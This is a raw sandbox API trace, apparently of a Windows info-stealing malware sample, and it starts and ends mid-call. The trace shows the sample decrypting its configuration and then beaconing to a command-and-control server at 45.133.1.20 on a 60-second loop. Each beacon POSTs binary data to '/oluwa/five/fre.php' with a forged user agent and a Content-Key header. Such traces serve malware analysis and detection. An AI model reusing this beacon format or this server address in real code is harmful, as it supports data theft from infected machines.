hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0302.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a8) returned 0xb70 [0302.755] Sleep (dwMilliseconds=0xea60) [0302.761] GetProcessHeap () returned 0x6a0000 [0302.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0302.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.763] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.776] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0302.785] GetProcessHeap () returned 0x6a0000 [0302.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0302.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.805] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0302.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.819] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.820] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.820] GetProcessHeap () returned 0x6a0000 [0302.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0302.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.822] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0302.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.824] CryptDestroyKey (hKey=0x6ad020) returned 1 [0302.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.826] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0302.826] GetProcessHeap () returned 0x6a0000 [0302.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0302.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.827] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.829] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.830] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.833] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.833] GetProcessHeap () returned 0x6a0000 [0302.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0302.833] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0302.834] GetProcessHeap () returned 0x6a0000 [0302.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0302.834] GetProcessHeap () returned 0x6a0000 [0302.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0302.835] GetProcessHeap () returned 0x6a0000 [0302.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0302.835] GetProcessHeap () returned 0x6a0000 [0302.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0302.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0302.861] GetProcessHeap () returned 0x6a0000 [0302.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0302.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.862] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0302.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.863] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.865] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.865] GetProcessHeap () returned 0x6a0000 [0302.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0302.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.866] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0302.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.868] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0302.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.870] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0302.870] GetProcessHeap () returned 0x6a0000 [0302.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0302.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.871] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0302.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.872] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0302.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.873] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0302.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.874] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0302.874] GetProcessHeap () returned 0x6a0000 [0302.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0302.874] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0302.874] GetProcessHeap () returned 0x6a0000 [0302.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0302.874] socket (af=2, type=1, protocol=6) returned 0xb74 [0302.874] connect (s=0xb74, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0302.900] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0302.900] GetProcessHeap () returned 0x6a0000 [0302.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0302.900] GetProcessHeap () returned 0x6a0000 [0302.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0302.901] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0302.902] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0302.902] GetProcessHeap () returned 0x6a0000 [0302.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da4c8 [0302.902] GetProcessHeap () returned 0x6a0000 [0302.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0302.903] GetProcessHeap () returned 0x6a0000 [0302.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0302.903] GetProcessHeap () returned 0x6a0000 [0302.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0302.904] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0302.905] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0302.905] GetProcessHeap () returned 0x6a0000 [0302.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0302.905] GetProcessHeap () returned 0x6a0000 [0302.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0302.905] send (s=0xb74, buf=0x6bd460*, len=242, flags=0) returned 242 [0302.906] send (s=0xb74, buf=0x6bb998*, len=159, flags=0) returned 159 [0302.906] GetProcessHeap () returned 0x6a0000 [0302.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0302.906] recv (in: s=0xb74, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0303.015] GetProcessHeap () returned 0x6a0000 [0303.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0303.016] GetProcessHeap () returned 0x6a0000 [0303.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0303.019] GetProcessHeap () returned 0x6a0000 [0303.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da4c8 | out: hHeap=0x6a0000) returned 1 [0303.023] GetProcessHeap () returned 0x6a0000 [0303.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0303.023] closesocket (s=0xb74) returned 0 [0303.025] GetProcessHeap () returned 0x6a0000 [0303.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0303.025] GetProcessHeap () returned 0x6a0000 [0303.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.026] GetProcessHeap () returned 0x6a0000 [0303.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0303.026] GetProcessHeap () returned 0x6a0000 [0303.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0303.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18ac) returned 0xb74 [0303.029] Sleep (dwMilliseconds=0xea60) [0303.031] GetProcessHeap () returned 0x6a0000 [0303.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0303.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0303.052] GetProcessHeap () returned 0x6a0000 [0303.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0303.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.056] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0303.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.057] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.058] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.058] GetProcessHeap () returned 0x6a0000 [0303.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0303.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.068] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0303.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.069] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0303.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.070] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0303.071] GetProcessHeap () returned 0x6a0000 [0303.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.072] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.073] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.075] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.076] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.076] GetProcessHeap () returned 0x6a0000 [0303.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0303.076] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.076] GetProcessHeap () returned 0x6a0000 [0303.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0303.077] GetProcessHeap () returned 0x6a0000 [0303.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.077] GetProcessHeap () returned 0x6a0000 [0303.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0303.077] GetProcessHeap () returned 0x6a0000 [0303.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0303.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.079] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0303.093] GetProcessHeap () returned 0x6a0000 [0303.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0303.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.094] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0303.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.095] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.096] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.096] GetProcessHeap () returned 0x6a0000 [0303.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0303.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.103] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0303.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.104] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0303.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.105] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0303.105] GetProcessHeap () returned 0x6a0000 [0303.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.106] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0303.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.108] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0303.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.111] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0303.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.113] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0303.113] GetProcessHeap () returned 0x6a0000 [0303.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0303.113] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0303.113] GetProcessHeap () returned 0x6a0000 [0303.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0303.113] socket (af=2, type=1, protocol=6) returned 0xb78 [0303.114] connect (s=0xb78, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0303.145] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0303.145] GetProcessHeap () returned 0x6a0000 [0303.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0303.145] GetProcessHeap () returned 0x6a0000 [0303.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0303.146] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0303.147] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.148] GetProcessHeap () returned 0x6a0000 [0303.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db188 [0303.148] GetProcessHeap () returned 0x6a0000 [0303.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0303.148] GetProcessHeap () returned 0x6a0000 [0303.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0303.148] GetProcessHeap () returned 0x6a0000 [0303.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0303.149] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0303.150] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.150] GetProcessHeap () returned 0x6a0000 [0303.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0303.150] GetProcessHeap () returned 0x6a0000 [0303.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0303.151] send (s=0xb78, buf=0x6bd460*, len=242, flags=0) returned 242 [0303.153] send (s=0xb78, buf=0x6bb998*, len=159, flags=0) returned 159 [0303.153] GetProcessHeap () returned 0x6a0000 [0303.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0303.153] recv (in: s=0xb78, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0303.241] GetProcessHeap () returned 0x6a0000 [0303.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0303.242] GetProcessHeap () returned 0x6a0000 [0303.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0303.244] GetProcessHeap () returned 0x6a0000 [0303.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db188 | out: hHeap=0x6a0000) returned 1 [0303.245] GetProcessHeap () returned 0x6a0000 [0303.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0303.245] closesocket (s=0xb78) returned 0 [0303.246] GetProcessHeap () returned 0x6a0000 [0303.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0303.246] GetProcessHeap () returned 0x6a0000 [0303.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.246] GetProcessHeap () returned 0x6a0000 [0303.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0303.247] GetProcessHeap () returned 0x6a0000 [0303.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0303.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b0) returned 0xb78 [0303.250] Sleep (dwMilliseconds=0xea60) [0303.252] GetProcessHeap () returned 0x6a0000 [0303.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0303.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 